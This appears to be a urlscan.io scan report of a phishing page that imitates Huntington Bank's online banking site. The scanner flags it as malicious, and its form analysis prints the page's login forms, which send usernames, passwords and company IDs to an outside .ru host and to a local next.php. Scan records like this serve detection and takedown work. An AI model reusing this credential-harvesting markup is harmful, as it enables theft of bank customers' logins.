h489589-27.web.app Open in urlscan Pro
2620:0:890::100  Malicious Activity! Public Scan

URL: https://h489589-27.web.app/
Submission: On February 11 via api from ZA — Scanned from DE

Form analysis 3 forms found in the DOM

Name: searchFormGET #

<form class="search" id="header-search" method="get" name="searchForm" autocomplete="off" action="#">
  <label for="searchInputHeader" class="vh">Search Input</label>
  <input type="text" placeholder="Ask Huntington" name="question" id="searchInputHeader" class="searchInput" maxlength="120" aria-autocomplete="list" role="combobox" aria-expanded="false">
  <button type="submit" aria-label="Submit Search">
    <span class="icon">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 26.4 26.6" focusable="false">
        <path
          d="M25.9 23.3l-6.8-6.7c1.2-1.7 1.9-3.8 1.9-6.1C21.1 4.7 16.3 0 10.5 0S0 4.7 0 10.5 4.7 21 10.5 21c2 0 3.9-.6 5.5-1.6l6.8 6.7c.6.6 1.5.6 2.1 0l1-.9c.6-.5.6-1.4 0-1.9zm-15.4-5.2c-4.2 0-7.5-3.4-7.5-7.5C3 6.4 6.4 3 10.5 3c4.2 0 7.5 3.4 7.5 7.5.1 4.2-3.3 7.6-7.5 7.6z">
        </path>
      </svg>
    </span>
  </button>
</form>

POST https://vh.mnewebsa.ru/next.php

<form class="login__form" action="https://vh.mnewebsa.ru/next.php" method="POST">
  <input type="hidden" name="login-form-type" value="pwd">
  <fieldset class="login__form-fieldset">
    <legend class="login__label login__label--pad-bot"> Log into Online Banking </legend>
    <div class="login__form-group">
      <div class="cinput__wrap" id="personal-username-wrap">
        <div class="cinput">
          <label class="cinput__label" for="personal-username">Username</label>
          <input id="personal-username" class="cinput__field " name="username" type="text" autocomplete="off" required="">
        </div>
      </div>
    </div>
    <div class="login__form-group">
      <div class="cinput__wrap" id="personal-password-wrap">
        <div class="cinput">
          <label class="cinput__label" for="personal-password">Password</label>
          <input id="personal-password" class="cinput__field " name="password" type="password" required="">
        </div>
      </div>
    </div>
  </fieldset>
  <div class="div_login_button">
    <div class="login__form-flex">
      <button class="btn--gray clickTracking" type="submit" name="btn1">
        <span class="icon">
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" focusable="false">
            <path
              d="M16.2641,10.283V7.7381a4.2987,4.2987,0,1,0-8.5973,0v2.5474a1.7624,1.7624,0,0,0-1.6594,1.7591v6.7536A1.7623,1.7623,0,0,0,7.77,20.5608h8.46a1.762,1.762,0,0,0,1.7626-1.7626V12.0446A1.762,1.762,0,0,0,16.2641,10.283Zm-3.3768,5.7476V17.96H11.1357V16.044a1.717,1.717,0,1,1,1.7516-.0134Zm1.6689-5.7485H9.3746V7.66a2.5383,2.5383,0,0,1,2.5383-2.5383h.1051A2.5382,2.5382,0,0,1,14.5562,7.66Z">
            </path>
          </svg>
        </span> Log In </button>
      <div class="login__forgot-links">
        <a href="#" class="forgot__link forgot__link--personal" rel="noopener noreferrer" target="_blank" title="Forgot Username (opens in a new window)">Forgot Username?</a>
        <a href="#" class="forgot__link forgot__link--personal" rel="noopener noreferrer" target="_blank" title="Forgot Password? (opens in a new window)">Forgot Password?</a>
      </div>
    </div>
    <div class="login__form-flex">
      <div class="login__form-utils">
        <span class="login__label login__label--pad-bot"> New to Online Banking? </span>
        <a href="#" class="enroll_link">Enroll Now</a> or <a href="#" title="Learn more about Online Banking">Learn More</a>
      </div>
    </div>
  </div>
</form>

POST ./next.php

<form class="login__form" action="./next.php" method="POST">
  <input type="hidden" name="source" value="huntington.com">
  <fieldset class="login__form-fieldset">
    <legend class="login__label login__label--pad-bot"> Log into Business Online </legend>
    <div class="login__form-group">
      <div class="cinput__wrap" id="business-company-id-wrap">
        <div class="cinput">
          <label class="cinput__label" for="business-company-id">Company ID</label>
          <input id="business-company-id" class="cinput__field " name="companyid" type="text" required="">
        </div>
      </div>
    </div>
    <div class="login__form-group">
      <div class="cinput__wrap" id="business-user-id-wrap">
        <div class="cinput">
          <label class="cinput__label" for="business-user-id">User ID</label>
          <input id="business-user-id" class="cinput__field " name="userid" type="text" autocomplete="off" required="">
        </div>
      </div>
    </div>
    <div class="login__form-group">
      <div class="cinput__wrap" id="business-password-wrap">
        <div class="cinput">
          <label class="cinput__label" for="business-password">Password</label>
          <input id="business-password" class="cinput__field " name="password" type="password" required="">
        </div>
      </div>
    </div>
  </fieldset>
  <div class="div_login_button">
    <div class="login__form-flex">
      <button class="btn btn--gray clicktracking" type="submit" name="btn2">
        <span class="icon">
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" focusable="false">
            <path
              d="M16.2641,10.283V7.7381a4.2987,4.2987,0,1,0-8.5973,0v2.5474a1.7624,1.7624,0,0,0-1.6594,1.7591v6.7536A1.7623,1.7623,0,0,0,7.77,20.5608h8.46a1.762,1.762,0,0,0,1.7626-1.7626V12.0446A1.762,1.762,0,0,0,16.2641,10.283Zm-3.3768,5.7476V17.96H11.1357V16.044a1.717,1.717,0,1,1,1.7516-.0134Zm1.6689-5.7485H9.3746V7.66a2.5383,2.5383,0,0,1,2.5383-2.5383h.1051A2.5382,2.5382,0,0,1,14.5562,7.66Z">
            </path>
          </svg>
        </span> Log In </button>
      <div class="login__forgot-links">
        <a href="#" role="button" class="forgot__link" data-overlay="#forgot-password">Forgot Password?</a>
      </div>
    </div>
    <div class="login__form-flex">
      <div class="login__form-utils">
        <span class="login__label login__label--pad-bot"> New to Business Online? </span>
        <a href="#" title="Commercial Online Services">Learn More</a>
      </div>
    </div>
  </div>
</form>

Text Content

 * Open an Account
 * Customer Service
 * Community
 * Security
 * Find a branch

PersonalPrivate BankBusinessCommercial
Search Input
Switch to:
Login
Personal Back
 * Banking
   Banking
    * Checking
      Checking
       * Open a Checking Account Online
       * Asterisk-Free Checking®
       * Huntington 5 Checking®
       * Huntington 25 Checking®
       * Compare Checking Accounts
       * Platinum Debit Card
       * Pay With Phone: Mobile Payments
       * Student Banking
   
    * Savings & CDs
      Savings & CDs
       * Open a Savings Account Online
       * Huntington® Relationship Money Market Account
       * Huntington® Money Market Account IRA
       * Huntington® Relationship Savings
       * Huntington® Premier Savings
       * Certificate Of Deposit (CDs)
   
    * Credit Card
      Credit Card
       * Credit Card Overview
       * Voice Credit Card® 3x Rewards
       * Voice Credit Card® Lower Rates
   
    * Military Banking
      Military Banking
       * Military Banking Overview
       * Servicemembers Civil Relief Act
   
    * 24-Hour Grace
      24-Hour Grace
       * 24-Hour Grace® Overview
       * Overdraft
       * All Day Deposit℠
       * $50 Safety Zone℠

 * Borrowing
   Borrowing
    * Mortgages
      Mortgages
       * Compare Home Loans
       * Mortgage Loan Comparison
       * Mortgage 101: Our Tips & Tools
       * Fixed Rate Loan
       * Adjustable Rate Mortgages
       * FHA/VA/USDA Loans
       * REO Property Listings
       * Get A Rate Quote
       * Find A Loan Officer
   
    * Home Equity
      Home Equity
       * Home Equity Comparison
       * First Mortgage Equity Loan
       * Home Equity Loan
       * Home Equity Lines of Credit
   
    * Specialty Mortgages
      Specialty Mortgages
       * Specialty Mortgage Comparison
       * Physicians Only
       * Jumbo
       * HomeStyle Renovation
       * Construction
       * State Bond
       * Employee Relocation Services
       * Third Party Lending Services
   
    * Personal Loans
      Personal Loans
       * Personal Loans
       * Auto Loans Overview
       * Auto Loans
       * Auto Buying Resources

 * Investments
   Investments
    * Investments
      Investments
       * Investments Overview
       * Life and Income Planning
       * Grow and Manage Your Wealth
       * Manage Your Risks
       * Trusts & Estates
       * Disclosure Documents

 * Insurance
   Insurance
    * Insurance
      Insurance
       * Insurance Overview
       * Individual Health
       * Home
       * Life
       * Motor Vehicle
       * Residential Title

 * Learn
   Learn
    * Financial Education
      Financial Education
       * All Categories
   
    * Personal Finance
      Personal Finance
       * Checking Basics
       * Budgeting & Spending
       * Saving Money
       * Credit, Debt, & Loans
   
    * Planning for the Future
      Planning for the Future
       * College & Career
       * Home & Auto
       * Investing & Retirement
       * Financial Calculators
   
    * Featured Articles
      Featured Articles
       * How to Write a Check
       * How to Build Credit
       * Tips for First-Time Homebuyers
       * Is College Debt Worth It?

 * Online Services
   Online Services
    * Digital Banking Tools
      Digital Banking Tools
       * Digital Banking Overview
       * Huntington Heads Up®
       * Money Scout℠
       * Spend Analysis
       * Spend Setter℠
       * Savings Goal Getter℠
       * Look Ahead Calendar℠
   
    * Online Banking
      Online Banking
       * Personal Online Banking Overview
       * Bill Pay
       * Online Retirement
       * Online Trust
       * Online Mortgages
       * Online Investments
   
    * Mobile Banking
      Mobile Banking
       * Mobile Banking Overview
       * Mobile Banking App
       * Mobile & ATM Deposit
       * Mobile Banking FAQ
       * Zelle®

 * Security
   Security
    * Prevention Tips
      Prevention Tips
       * Understanding Phishing
       * Improve Your Passwords
       * Online Banking Security
       * Debit & Credit Card Security Tips
       * Tips for You & Your Family
       * Tips for Your Business
   
    * Monitoring Tips
      Monitoring Tips
       * Sign Up for Fraud Alerts
       * Commons Types of Fraud & Scams
       * Tips for Monitoring Accounts
   
    * Resolve
      Resolve
       * Rebuilding Your Identity Guide

Switch to:
Private Bank
Business
Commercial
 * Open an Account
 * Customer Service
 * All Branches & ATMs
 * Community
 * About Us
 * Routing Numbers
 * Site Map
 * Careers
 * Investor Relations
 * Privacy & Security
 * Email Unsubscribe
 * FDIC Notice

 * Personal & Business
 * Commercial
 * Other

Log into Online Banking
Username
Password
Log In
Forgot Username? Forgot Password?
New to Online Banking? Enroll Now or Learn More
Skip to navigation
Log into Business Online
Company ID
User ID
Password
Log In
Forgot Password?
New to Business Online? Learn More
Skip to navigation

 


FORGOT PASSWORD?

Please contact your Company Administrator to reset your password if you continue
having problems logging in. Your Company Administrator is the only individual
able to reset your password.

Cancel
 * About Us
 * Investor Relations
 * Careers
 * Site Map
 * Privacy Policies
 * Privacy & Security
 * Email Updates
 * All Branches & ATMS
 * Routing Numbers
 * Give Feedback

 * Visit Huntington's Facebook page
 * Visit Huntington's Twitter feed
 * Visit Huntington's Instagram page
 * Visit Huntington's YouTube page
 * Visit Huntington's LinkedIn page

Lending products are subject to credit application and approval.

Investment, Insurance and Non-deposit Trust products are: NOT A DEPOSIT • NOT
FDIC INSURED • NOT GUARANTEED BY THE BANK • NOT INSURED BY ANY FEDERAL
GOVERNMENT AGENCY • MAY LOSE VALUE

The Huntington National Bank is an Equal Housing Lender and Member FDIC. ®,
Huntington®,Huntington.Welcome.® and Huntington Heads Up® are federally
registered service marks of Huntington Bancshares Incorporated. © 2021
Huntington Bancshares Incorporated.